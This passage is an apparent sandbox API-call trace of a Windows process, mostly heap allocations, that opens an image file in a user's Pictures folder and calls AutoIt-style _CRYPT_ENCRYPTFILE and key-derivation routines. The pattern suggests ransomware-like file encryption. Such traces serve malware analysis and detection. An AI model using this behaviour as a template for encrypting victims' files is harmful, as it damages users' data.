Flags=0x0, Size=0x10) returned 0x43ca418 [0087.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca190 [0087.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca190, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0087.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.027] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0087.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0087.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0087.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0087.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0087.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0087.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0087.028] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\9TpncYB524P.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\9tpncyb524p.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0087.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0087.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0087.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0087.030] FreeLibrary (hLibModule=0x772d0000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.031] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.031] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.032] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0087.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0087.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0087.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0087.034] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9cf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0087.035] CloseHandle (hObject=0x258) returned 1 [0087.035] FreeLibrary (hLibModule=0x772d0000) returned 1 [0087.035] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0087.035] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\9TpncYB524P.bmp", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd22c4e00, ftCreationTime.dwHighDateTime=0x1d5ed16, ftLastAccessTime.dwLowDateTime=0x3438bd60, ftLastAccessTime.dwHighDateTime=0x1d5e4cd, ftLastWriteTime.dwLowDateTime=0x3438bd60, ftLastWriteTime.dwHighDateTime=0x1d5e4cd, nFileSizeHigh=0x0, nFileSizeLow=0xca29, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="9TpncYB524P.bmp", cAlternateFileName="9TPNCY~1.BMP")) returned 0x41ac700 [0087.035] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0087.036] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0087.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ec8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0087.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0087.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0087.036] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0087.037] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0087.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.037] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0087.037] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.037] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, 